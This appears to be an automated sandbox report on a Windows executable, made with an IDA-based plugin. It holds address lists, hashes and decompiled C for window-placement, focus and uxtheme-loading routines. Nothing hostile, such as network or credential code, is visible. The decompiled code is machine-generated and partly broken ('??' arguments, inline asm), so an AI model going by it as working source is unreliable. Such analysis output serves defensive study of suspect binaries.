                                                    0x0044eb22
                                                    0x0044eb24
                                                    0x0044eb9a
                                                    0x0044eb9a
                                                    0x0044eba3
                                                    0x00000000
                                                    0x0044eb26
                                                    0x0044eb26
                                                    0x0044eb27
                                                    0x0044eb27
                                                    0x0044eb29
                                                    0x0044eb29
                                                    0x0044eb2d
                                                    0x0044eb53
                                                    0x0044eb2f
                                                    0x0044eb2f
                                                    0x0044eb32
                                                    0x0044eb34
                                                    0x0044eb46
                                                    0x0044eb36
                                                    0x0044eb41
                                                    0x0044eb41
                                                    0x0044eb34
                                                    0x0044eb5b
                                                    0x0044eb60
                                                    0x0044eb6b
                                                    0x0044eb6e
                                                    0x0044eb72
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb96
                                                    0x0044eb97
                                                    0x0044eb97
                                                    0x0044eb98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb98
                                                    0x0044eb7d
                                                    0x0044eb85
                                                    0x0044eb8c
                                                    0x0044eb8c
                                                    0x0044ea96
                                                    0x0044ea96
                                                    0x0044ea97
                                                    0x0044ef00
                                                    0x0044ef01
                                                    0x0044ef03
                                                    0x00000000
                                                    0x0044ef05
                                                    0x0044ef05
                                                    0x0044ef06
                                                    0x0044ef06
                                                    0x0044ef08
                                                    0x0044ef12
                                                    0x0044ef1a
                                                    0x0044ef1d
                                                    0x0044ef20
                                                    0x00000000
                                                    0x00000000
                                                    0x0044ef2a
                                                    0x0044ef2f
                                                    0x0044ef31
                                                    0x0044ef3f
                                                    0x0044ef40
                                                    0x0044ef40
                                                    0x0044ef41
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044ef31
                                                    0x0044ef38
                                                    0x0044ef38
                                                    0x0044ea9d
                                                    0x00000000
                                                    0x0044ea9d
                                                    0x0044ea97
                                                    0x0044ea94
                                                    0x00000000
                                                    0x0044ea6a
                                                    0x0044ea6a
                                                    0x0044eaa8
                                                    0x0044eaa9
                                                    0x0044eaab
                                                    0x00000000
                                                    0x0044eab1
                                                    0x0044eab1
                                                    0x0044eab2
                                                    0x0044eab2
                                                    0x0044eab4
                                                    0x0044eab9
                                                    0x0044eac2
                                                    0x0044eac7
                                                    0x0044eac9
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eacf
                                                    0x0044ead0
                                                    0x0044ead0
                                                    0x0044ead1
                                                    0x00000000
                                                    0x0044ead3
                                                    0x00000000
                                                    0x0044ead3
                                                    0x00000000
                                                    0x0044ead1
                                                    0x0044eab4
                                                    0x00000000
                                                    0x0044ea6c
                                                    0x0044ea6c
                                                    0x0044ea6f
                                                    0x0044ecb2
                                                    0x0044ecbb
                                                    0x0044ecbc
                                                    0x0044ecbe
                                                    0x00000000
                                                    0x0044ecc4
                                                    0x0044ecc4
                                                    0x0044ecc5
                                                    0x0044ecc5
                                                    0x0044ecc7
                                                    0x0044ecde
                                                    0x0044ece1
                                                    0x0044ece5
                                                    0x00000000
                                                    0x00000000
                                                    0x0044edad
                                                    0x0044edae
                                                    0x0044edae
                                                    0x0044edaf
                                                    0x00000000
                                                    0x0044edb5
                                                    0x00000000
                                                    0x0044edb5
                                                    0x00000000
                                                    0x0044edaf
                                                    0x0044ecf7
                                                    0x0044ecfc
                                                    0x0044ecfd
                                                    0x0044ed02
                                                    0x0044ed05
                                                    0x0044ed14
                                                    0x0044ed19
                                                    0x0044ed1a
                                                    0x0044ed1f
                                                    0x0044ed22
                                                    0x0044ed2e
                                                    0x0044ed43
                                                    0x0044ed5c
                                                    0x0044ed63
                                                    0x0044ed66
                                                    0x0044ed69
                                                    0x0044ed6e
                                                    0x0044ed73
                                                    0x0044ed88
                                                    0x0044ed88
                                                    0x0044ea75
                                                    0x0044ea75
                                                    0x0044ea76
                                                    0x0044edbd
                                                    0x0044edc6
                                                    0x0044edc7
                                                    0x0044edc9
                                                    0x00000000
                                                    0x0044edcf
                                                    0x0044edcf
                                                    0x0044edd0
                                                    0x0044edd0
                                                    0x0044edd2
                                                    0x0044ede9
                                                    0x0044edec
                                                    0x0044edf0
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eef0
                                                    0x0044eef1
                                                    0x0044eef1
                                                    0x0044eef2
                                                    0x00000000
                                                    0x0044eef8
                                                    0x00000000
                                                    0x0044eef8
                                                    0x00000000
                                                    0x0044eef2
                                                    0x0044edf9
                                                    0x0044edfd
                                                    0x0044ee02
                                                    0x0044ee10
                                                    0x0044ee1f
                                                    0x0044ee2d
                                                    0x0044ee39
                                                    0x0044ee47
                                                    0x0044ee50
                                                    0x0044ee65
                                                    0x0044ee7f
                                                    0x0044ee84
                                                    0x0044ee87
                                                    0x0044ee8a
                                                    0x0044ee8f
                                                    0x0044ee94
                                                    0x0044eea6
                                                    0x0044eea6
                                                    0x0044ea7c
                                                    0x0044ea7f
                                                    0x0044ebb0
                                                    0x0044ebb9
                                                    0x0044ebba
                                                    0x0044ebbc
                                                    0x00000000
                                                    0x0044ebc2
                                                    0x0044ebc2
                                                    0x0044ebc3
                                                    0x0044ebc3
                                                    0x0044ebc5
                                                    0x0044ebd1
                                                    0x0044ebd4
                                                    0x0044ebd7
                                                    0x0044ebda
                                                    0x0044ec05
                                                    0x0044ebdc
                                                    0x0044ebe9
                                                    0x0044ebe9
                                                    0x0044ec08
                                                    0x0044ec0c
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eca2
                                                    0x0044eca3
                                                    0x0044eca3
                                                    0x0044eca4
                                                    0x00000000
                                                    0x0044ecaa
                                                    0x00000000
                                                    0x0044ecaa
                                                    0x00000000
                                                    0x0044eca4
                                                    0x0044ec24
                                                    0x0044ec29
                                                    0x0044ec2b
                                                    0x0044ec32
                                                    0x0044ec3d
                                                    0x0044ec3f
                                                    0x0044ec3f
                                                    0x0044ec44
                                                    0x0044ec4c
                                                    0x0044ec4f
                                                    0x0044ec51
                                                    0x0044ec57
                                                    0x0044ec59
                                                    0x0044ec60
                                                    0x0044ec60
                                                    0x0044ec66
                                                    0x0044ec6c
                                                    0x0044ec73
                                                    0x0044ec8f
                                                    0x0044ec98
                                                    0x0044ec75
                                                    0x0044ec85
                                                    0x0044ec85
                                                    0x0044ec73
                                                    0x0044ec51
                                                    0x0044ea85
                                                    0x0044ef43
                                                    0x0044ef46
                                                    0x0044ef4a
                                                    0x0044ef4d
                                                    0x0044ef51
                                                    0x0044ef54
                                                    0x0044ef55
                                                    0x0044ef5a
                                                    0x0044ef5a
                                                    0x0044ef5d
                                                    0x0044ef5f
                                                    0x0044ef62
                                                    0x0044ef65
                                                    0x0044ef72
                                                    0x0044ef72
                                                    0x0044ea76
                                                    0x0044ea6f
                                                    0x0044ea6a
                                                    0x00000000

                                                    APIs
                                                    • SaveDC.GDI32(?), ref: 0044ED0F
                                                    • RestoreDC.GDI32(?,?), ref: 0044ED83
                                                    • 733AB080.USER32(?,00000000,0044EF73), ref: 0044EDFD
                                                    • SaveDC.GDI32(?), ref: 0044EE34
                                                    • RestoreDC.GDI32(?,?), ref: 0044EEA1
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044EF73), ref: 0044EF55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: RestoreSave$B080NtdllProc_Window
                                                    • String ID: LbC
                                                    • API String ID: 4024241980-1054848185
                                                    • Opcode ID: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                    • Instruction ID: 9827756e5d0f78ec9e29d95b15367e488dbc04d0ac3e4e0047c09454960c1bc5
                                                    • Opcode Fuzzy Hash: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                    • Instruction Fuzzy Hash: 5AE19D34A04605DFEB10DF6AC8819AEF3F5FF58304B2485AAE805A7361D738ED41CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 37%
                                                    			E0045A104(void* __eax) {
                                                    				struct HWND__* _t21;
                                                    				intOrPtr* _t26;
                                                    				signed int _t29;
                                                    				intOrPtr* _t30;
                                                    				int _t33;
                                                    				intOrPtr _t36;
                                                    				void* _t51;
                                                    				int _t60;
                                                    
                                                    				_t51 = __eax;
                                                    				_t21 = IsIconic( *(__eax + 0x30));
                                                    				if(_t21 != 0) {
                                                    					SetActiveWindow( *(_t51 + 0x30));
                                                    					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
                                                    						L6:
                                                    						E0045906C( *(_t51 + 0x30), 9, __eflags);
                                                    					} else {
                                                    						_t60 = IsWindowEnabled(E00441704( *((intOrPtr*)(_t51 + 0x44))));
                                                    						if(_t60 == 0) {
                                                    							goto L6;
                                                    						} else {
                                                    							_push(0);
                                                    							_push(0xf120);
                                                    							_push(0x112);
                                                    							_push( *(_t51 + 0x30));
                                                    							L00407540();
                                                    						}
                                                    					}
                                                    					_t26 =  *0x49d970; // 0x49e900
                                                    					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                                    					if(_t60 < 0) {
                                                    						asm("adc eax, 0x0");
                                                    					}
                                                    					_t30 =  *0x49d970; // 0x49e900
                                                    					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                                    					if(_t60 < 0) {
                                                    						asm("adc eax, 0x0");
                                                    					}
                                                    					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
                                                    					_t36 =  *((intOrPtr*)(_t51 + 0x44));
                                                    					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                                    						E00454D78(_t36, 0);
                                                    						E00457194( *((intOrPtr*)(_t51 + 0x44)));
                                                    					}
                                                    					E0045974C(_t51);
                                                    					_t21 =  *0x49ebbc; // 0x0
                                                    					_t55 =  *((intOrPtr*)(_t21 + 0x64));
                                                    					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
                                                    						_t21 = SetFocus(E00441704(_t55));
                                                    					}
                                                    					if( *((short*)(_t51 + 0x122)) != 0) {
                                                    						return  *((intOrPtr*)(_t51 + 0x120))();
                                                    					}
                                                    				}
                                                    				return _t21;
                                                    			}

                                                    APIs
                                                    • IsIconic.USER32(?), ref: 0045A10C
                                                    • SetActiveWindow.USER32(?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A11D
                                                    • IsWindowEnabled.USER32(00000000), ref: 0045A140
                                                    • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A159
                                                    • SetWindowPos.USER32(?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A19F
                                                    • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A1E4
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                    • String ID:
                                                    • API String ID: 3996302123-0
                                                    • Opcode ID: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                    • Instruction ID: e53a9b633d1b0bd006f11759a665d113d80ac3550e73a578dd09315b07be2b8d
                                                    • Opcode Fuzzy Hash: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                    • Instruction Fuzzy Hash: B831DD71B006009BEB11EB69CD86B563798AB04709F0805AAFE04DF2D7D67DEC58C75A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E004410F0(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                                    				void* _v20;
                                                    				struct _WINDOWPLACEMENT _v48;
                                                    				char _v64;
                                                    				void* _t31;
                                                    				int _t45;
                                                    				int _t51;
                                                    				void* _t52;
                                                    				int _t56;
                                                    				int _t58;
                                                    
                                                    				_t56 = __ecx;
                                                    				_t58 = __edx;
                                                    				_t52 = __eax;
                                                    				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                                    					L4:
                                                    					if(E00441A08(_t52) == 0) {
                                                    						L7:
                                                    						 *(_t52 + 0x40) = _t58;
                                                    						 *(_t52 + 0x44) = _t56;
                                                    						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                                                    						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                                                    						_t31 = E00441A08(_t52);
                                                    						__eflags = _t31;
                                                    						if(_t31 != 0) {
                                                    							_v48.length = 0x2c;
                                                    							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                    							E0043A91C(_t52,  &_v64);
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                    						}
                                                    						L9:
                                                    						E0043A5D0(_t52);
                                                    						return E00403DE8(_t52, _t66);
                                                    					}
                                                    					_t45 = IsIconic( *(_t52 + 0x180));
                                                    					_t66 = _t45;
                                                    					if(_t45 != 0) {
                                                    						goto L7;
                                                    					}
                                                    					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                                                    					goto L9;
                                                    				} else {
                                                    					_t51 = _a4;
                                                    					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                                    						return _t51;
                                                    					}
                                                    					goto L4;
                                                    				}
                                                    			}

                                                    APIs
                                                    • IsIconic.USER32(?), ref: 0044112F
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0044114D
                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00441183
                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004411A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Placement$Iconic
                                                    • String ID: ,
                                                    • API String ID: 568898626-3772416878
                                                    • Opcode ID: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                    • Instruction ID: 973ca0ced29493b3e0d87defc8b2cb9363f4da81e4e6ee6b5ea2909c58c8dcf6
                                                    • Opcode Fuzzy Hash: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                    • Instruction Fuzzy Hash: AA21B271A00108ABDF10EF69C8C19DA77A8AF4D354F00406AFE14EF352D779ED448B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E0045A054(void* __eax) {
                                                    				int _t21;
                                                    				struct HWND__* _t36;
                                                    				void* _t40;
                                                    
                                                    				_t40 = __eax;
                                                    				_t1 = _t40 + 0x30; // 0x0
                                                    				_t21 = IsIconic( *_t1);
                                                    				if(_t21 == 0) {
                                                    					E0045973C();
                                                    					_t2 = _t40 + 0x30; // 0x0
                                                    					SetActiveWindow( *_t2);
                                                    					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00441704( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
                                                    						_t15 = _t40 + 0x30; // 0x0
                                                    						_t21 = E0045906C( *_t15, 6, __eflags);
                                                    					} else {
                                                    						_t43 =  *((intOrPtr*)(_t40 + 0x44));
                                                    						_t36 = E00441704( *((intOrPtr*)(_t40 + 0x44)));
                                                    						_t13 = _t40 + 0x30; // 0x0
                                                    						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
                                                    						_push(0);
                                                    						_push(0xf020);
                                                    						_push(0x112);
                                                    						_t14 = _t40 + 0x30; // 0x0
                                                    						_t21 =  *_t14;
                                                    						_push(_t21);
                                                    						L00407540();
                                                    					}
                                                    					if( *((short*)(_t40 + 0x11a)) != 0) {
                                                    						return  *((intOrPtr*)(_t40 + 0x118))();
                                                    					}
                                                    				}
                                                    				return _t21;
                                                    			}

                                                    APIs
                                                    • IsIconic.USER32(00000000), ref: 0045A05C
                                                    • SetActiveWindow.USER32(00000000,?,?,0045A790), ref: 0045A074
                                                    • IsWindowEnabled.USER32(00000000), ref: 0045A097
                                                    • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,?,?,0045A790), ref: 0045A0C0
                                                    • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,?,?,0045A790), ref: 0045A0D5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                    • String ID:
                                                    • API String ID: 1720852555-0
                                                    • Opcode ID: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                    • Instruction ID: fcf5efa9db48042d746d78bebf6e1cf2cc32c712e84d9ef6b3749e70c2da43cc
                                                    • Opcode Fuzzy Hash: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                    • Instruction Fuzzy Hash: EF110071650200EBDB54EE69C9C6B9637E8AF04715F0800AABF04DF2D7D679EC448759
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E0042C6FC(void* __edi, struct HWND__* _a4, signed int _a8) {
                                                    				struct _WINDOWPLACEMENT _v48;
                                                    				void* __ebx;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				signed int _t19;
                                                    				intOrPtr _t21;
                                                    				struct HWND__* _t23;
                                                    
                                                    				_t19 = _a8;
                                                    				_t23 = _a4;
                                                    				if( *0x49e929 != 0) {
                                                    					if((_t19 & 0x00000003) == 0) {
                                                    						if(IsIconic(_t23) == 0) {
                                                    							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                                                    						} else {
                                                    							GetWindowPlacement(_t23,  &_v48);
                                                    						}
                                                    						return E0042C66C( &(_v48.rcNormalPosition), _t19);
                                                    					}
                                                    					return 0x12340042;
                                                    				}
                                                    				_t21 =  *0x49e904; // 0x42c6fc
                                                    				 *0x49e904 = E0042C4FC(1, _t19, _t21, __edi, _t23);
                                                    				return  *0x49e904(_t23, _t19);
                                                    			}

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: MonitorFromWindow
                                                    • API String ID: 190572456-2842599566
                                                    • Opcode ID: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                    • Instruction ID: a470fbf3681d2cee79b4262df8cd97740cfa3d316a724833ce9ade3e4696291a
                                                    • Opcode Fuzzy Hash: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                    • Instruction Fuzzy Hash: 1201ADB1A051296A8B00EB65ADC19BF735C9B84354B900037F810A3241D72CBE019BAE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 90%
                                                    			E0042E3B4(void* __ebx, void* __ecx) {
                                                    				char _v5;
                                                    				intOrPtr _t2;
                                                    				intOrPtr _t6;
                                                    				intOrPtr _t108;
                                                    				intOrPtr _t111;
                                                    
                                                    				_t2 =  *0x49ea48; // 0x22f0dc8
                                                    				E0042E1AC(_t2);
                                                    				_push(_t111);
                                                    				_push(0x42e767);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t111;
                                                    				 *0x49ea44 =  *0x49ea44 + 1;
                                                    				if( *0x49ea40 == 0) {
                                                    					 *0x49ea40 = LoadLibraryA("uxtheme.dll");
                                                    					if( *0x49ea40 > 0) {
                                                    						 *0x49e980 = GetProcAddress( *0x49ea40, "OpenThemeData");
                                                    						 *0x49e984 = GetProcAddress( *0x49ea40, "CloseThemeData");
                                                    						 *0x49e988 = GetProcAddress( *0x49ea40, "DrawThemeBackground");
                                                    						 *0x49e98c = GetProcAddress( *0x49ea40, "DrawThemeText");
                                                    						 *0x49e990 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
                                                    						 *0x49e994 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
                                                    						 *0x49e998 = GetProcAddress( *0x49ea40, "GetThemePartSize");
                                                    						 *0x49e99c = GetProcAddress( *0x49ea40, "GetThemeTextExtent");
                                                    						 *0x49e9a0 = GetProcAddress( *0x49ea40, "GetThemeTextMetrics");
                                                    						 *0x49e9a4 = GetProcAddress( *0x49ea40, "GetThemeBackgroundRegion");
                                                    						 *0x49e9a8 = GetProcAddress( *0x49ea40, "HitTestThemeBackground");
                                                    						 *0x49e9ac = GetProcAddress( *0x49ea40, "DrawThemeEdge");
                                                    						 *0x49e9b0 = GetProcAddress( *0x49ea40, "DrawThemeIcon");
                                                    						 *0x49e9b4 = GetProcAddress( *0x49ea40, "IsThemePartDefined");
                                                    						 *0x49e9b8 = GetProcAddress( *0x49ea40, "IsThemeBackgroundPartiallyTransparent");
                                                    						 *0x49e9bc = GetProcAddress( *0x49ea40, "GetThemeColor");
                                                    						 *0x49e9c0 = GetProcAddress( *0x49ea40, "GetThemeMetric");
                                                    						 *0x49e9c4 = GetProcAddress( *0x49ea40, "GetThemeString");
                                                    						 *0x49e9c8 = GetProcAddress( *0x49ea40, "GetThemeBool");
                                                    						 *0x49e9cc = GetProcAddress( *0x49ea40, "GetThemeInt");
                                                    						 *0x49e9d0 = GetProcAddress( *0x49ea40, "GetThemeEnumValue");
                                                    						 *0x49e9d4 = GetProcAddress( *0x49ea40, "GetThemePosition");
                                                    						 *0x49e9d8 = GetProcAddress( *0x49ea40, "GetThemeFont");
                                                    						 *0x49e9dc = GetProcAddress( *0x49ea40, "GetThemeRect");
                                                    						 *0x49e9e0 = GetProcAddress( *0x49ea40, "GetThemeMargins");
                                                    						 *0x49e9e4 = GetProcAddress( *0x49ea40, "GetThemeIntList");
                                                    						 *0x49e9e8 = GetProcAddress( *0x49ea40, "GetThemePropertyOrigin");
                                                    						 *0x49e9ec = GetProcAddress( *0x49ea40, "SetWindowTheme");
                                                    						 *0x49e9f0 = GetProcAddress( *0x49ea40, "GetThemeFilename");
                                                    						 *0x49e9f4 = GetProcAddress( *0x49ea40, "GetThemeSysColor");
                                                    						 *0x49e9f8 = GetProcAddress( *0x49ea40, "GetThemeSysColorBrush");
                                                    						 *0x49e9fc = GetProcAddress( *0x49ea40, "GetThemeSysBool");
                                                    						 *0x49ea00 = GetProcAddress( *0x49ea40, "GetThemeSysSize");
                                                    						 *0x49ea04 = GetProcAddress( *0x49ea40, "GetThemeSysFont");
                                                    						 *0x49ea08 = GetProcAddress( *0x49ea40, "GetThemeSysString");
                                                    						 *0x49ea0c = GetProcAddress( *0x49ea40, "GetThemeSysInt");
                                                    						 *0x49ea10 = GetProcAddress( *0x49ea40, "IsThemeActive");
                                                    						 *0x49ea14 = GetProcAddress( *0x49ea40, "IsAppThemed");
                                                    						 *0x49ea18 = GetProcAddress( *0x49ea40, "GetWindowTheme");
                                                    						 *0x49ea1c = GetProcAddress( *0x49ea40, "EnableThemeDialogTexture");
                                                    						 *0x49ea20 = GetProcAddress( *0x49ea40, "IsThemeDialogTextureEnabled");
                                                    						 *0x49ea24 = GetProcAddress( *0x49ea40, "GetThemeAppProperties");
                                                    						 *0x49ea28 = GetProcAddress( *0x49ea40, "SetThemeAppProperties");
                                                    						 *0x49ea2c = GetProcAddress( *0x49ea40, "GetCurrentThemeName");
                                                    						 *0x49ea30 = GetProcAddress( *0x49ea40, "GetThemeDocumentationProperty");
                                                    						 *0x49ea34 = GetProcAddress( *0x49ea40, "DrawThemeParentBackground");
                                                    						 *0x49ea38 = GetProcAddress( *0x49ea40, "EnableTheming");
                                                    					}
                                                    				}
                                                    				_v5 =  *0x49ea40 > 0;
                                                    				_pop(_t108);
                                                    				 *[fs:eax] = _t108;
                                                    				_push(0x42e76e);
                                                    				_t6 =  *0x49ea48; // 0x22f0dc8
                                                    				return E0042E1B4(_t6);
                                                    			}

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042E767), ref: 0042E3EA
                                                    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042E402
                                                    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042E414
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042E426
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042E438
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E44A
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E45C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042E46E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042E480
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042E492
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042E4A4
                                                    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042E4B6
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042E4C8
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042E4DA
                                                    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042E4EC
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042E4FE
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042E510
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042E522
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042E534
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042E546
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042E558
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042E56A
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042E57C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042E58E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042E5A0
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042E5B2
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042E5C4
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042E5D6
                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042E5E8
